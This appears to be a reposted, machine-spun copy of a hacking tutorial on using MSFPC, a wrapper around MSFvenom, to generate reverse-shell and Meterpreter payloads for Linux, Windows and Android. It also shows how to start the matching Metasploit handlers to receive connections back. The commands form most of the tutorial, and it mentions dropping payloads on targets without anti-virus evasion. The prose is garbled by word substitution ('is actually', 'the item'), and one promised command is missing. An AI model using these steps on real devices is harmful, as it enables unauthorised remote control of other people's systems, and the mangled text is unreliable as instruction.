3 months ago

How to Simplify Payload Creation with MSFPC « Null Byte :: WonderHowTo

The default tool for payload generation is actually MSFvenom. Msfvenom is actually both a payload generator, as well as an encoder. This specific tool is actually an incredibly powerful tool for payload generation, although the item can be difficult as well as requires a bit of reading for newer users. Even after the initial reading, generating a basic payload requires quite a bit of typing on the users part. Today we’re going to be looking at easier payload generation with Msfpc.

Msfpc, or the Msfvenom Payload Creator is actually a bash wrapper over MSFvenom designed to make basic payload creation easier. The goal is actually to allow the user to create payloads as simply as possible, using a minimum of one argument! If you’ve had to use MSFvenom in any capacity inside the past, you’ve probably already written a rough shell script to automate frequently generated payloads. Even if you have, This specific tool is actually definitely worth checking out.

Don’t Miss: Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)

With which out of the way, let’s get started off!

Step 1: Install MSFPC

First, we’ll need to install MSFPC. The way of doing so will vary slightly by operating system.

Installing on Kali Linux:

If you are installing msfpc on Kali Linux, the item is actually included inside the Kali repo’s, though set to manual install. You may already possess the item! To check run the command which msfpc in any terminal emulator. If you don’t possess the item, you can use apt to install the item, as seen below.

apt install msfpc

Generic Linux:

For Linux as well as Unix variants which do not have This specific package available, we just need to pull the item down through Github in our favorite terminal emulator with the following command.

git clone https://github.com/g0tmi1k/mpc; cd mpc

Once we have a clone of the project, we will want to copy the item into a directory which is actually within our path. The script itself suggests /usr/bin.

I personally don’t like to clutter up /usr/bin. the item’s easier for me to keep track of the tools which I have compiled or pulled through Github by keeping them in their own directory. The decision is actually up to you.

Check Out: How to Install the Metasploit Framework

System-Wide Install:

In order to install in /usr/bin, change directories to your mpc directory as well as configure permissions for the script using your terminal, as seen below.

cd /path/to/mpc
sudo chown root:root msfpc.sh
sudo chmod 755 msfpc.sh
sudo cp msfpc.sh /usr/bin

This specific set of commands alterations the owner as well as group of the script to root as well as root respectively. We then configure the file permissions to 755, or RWXR-XR-X. Finally we move the script into /usr/bin.

User Specific Installation:

To install to a pentest folder in your home directory, open your terminal as well as begin the process by typing the following.

mkdir ~/pentest
cd /path/to/mpc
chmod 700 msfpc.sh
cp msfpc.sh ~/pentest

You may already have a pentest directory, if This specific is actually the case there’s no need to make a completely new one. The chmod command alterations the permissions on the script to RWX——. Then we copy the item over into our pentest directory.

We’re not done yet, because This specific directory isn’t a part of our path. In order to fix This specific, we need to edit our .bashrc in our home directory. I used vim due to This specific, although you can use any editor you like. Type the following.

vim ~/.bashrc

Once you are editing, add the pentest directory to your path variable with This specific command.


You can leave out the trailing forward slash.

Lastly, we need to either close the terminal window as well as open a completely new one, or source our modified .bashrc.

source ~/.bashrc
which msfpc.sh

Msfpc is actually installed!

Step 2: Create a Linux Payload

today which we possess the tool installed on our system of choice, let’s get down to generating payloads. For our first payload, we’ll just generate a basic Linux reverse TCP ELF payload using msfpc.sh.

For the first payload, I will be only passing an individual argument to msfpc.

msfpc.sh linux

The first thing to notice here, is actually which since I only told msfpcsh I wanted to generate a Linux payload, as well as nothing else, Msfpc.sh doesn’t know what address we want to connect back to, so the item presents options. WAN is actually my external IP, lo is actually the localhost loop back interface, as well as ens33 is actually my network interface.

I selected “ens33” as well as proceeded. This specific can save some time if you don’t have your interface addresses memorized. The CMD output shows the full MSFvenom command which was executed in order to generate This specific payload. the item’s quite verbose.

Check Out: Getting started off with Metasploit

Once I generate the payload, I test the item out by setting up a Metasploit handler. However, I don’t have to manually configure This specific handler. Msfpc.sh creates a file named similarly to the payload, with an .rc extension. In order to start a handler due to This specific payload, all I need to do is actually pull the resource file into Metasploit.

sudo msfconsole -q -r ‘/home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc’

The reason for sudo in This specific command is actually because I am a non-privileged user attempting to bind to port 443. The -q argument tells msfconsole to skip the splash screen, as well as the -r option tells msfconsole to load the resource file. Once which’s done, I execute the payload, as well as the item connects back giving me a reverse shell.

Step 3: Create a Windows Payload

For our Windows payload, I thought I’d change the item up as well as create a lot of different payloads. Msfpc.sh allows for batch creation of payloads. This specific means which if I want to create all payloads which msfpc.sh can create with MSFvenom for a particular target, I can do so easily with the command below.

msfpc.sh windows batch ens33

In This specific command, I’m telling msfpc.sh to create windows payloads using all available combinations, using the IP through my network interface. During the generation process, some errors may come up, although at the end you will have a collection of Windows payloads as well as rc files to launch with msfconsole.

Step 4: Generate an Android Payload

We’ve done Windows as well as Linux. Let’s use msfpc.sh to generate a payload for Android devices. due to This specific example I’ll generate an Android reverse TCP HTTPS Meterpreter payload. We can do This specific with the command below.

msfpc.sh apk HTTPS ens33

This specific command will create a reverse TCP payload for Android, as well as tunnel the item through HTTPS, using my network interface as the IP address.

Payload Creation is actually today Even Easier

Msfpc.sh is actually a real time saver when the item comes to creating basic payloads quickly. The main drawback to This specific script is actually which the item genuinely only works for basic payloads. You aren’t going to get any encoding to bypass anti-virus, although depending on your targets, This specific may not matter. Sometimes, you just need to create a quick payload, drop the item somewhere as well as call the item a day. In This specific scenario, msfpc.sh genuinely shines.

Throughout This specific article, I touched on a variety of options for msfpc.sh. There are many additional options available, as well as if you execute the program with the –help verbose the script will give you a full help file. The help file is actually incredibly informative as well as easy to read.

As always, stay safe out there as well as if you have questions or comments, feel free to reach on on Twitter or inside the comments.

Screenshots as well as cover image by @0xBarrow / Null Byte

Leave a Comment

Your email address will not be published. Required fields are marked *

17 + seven =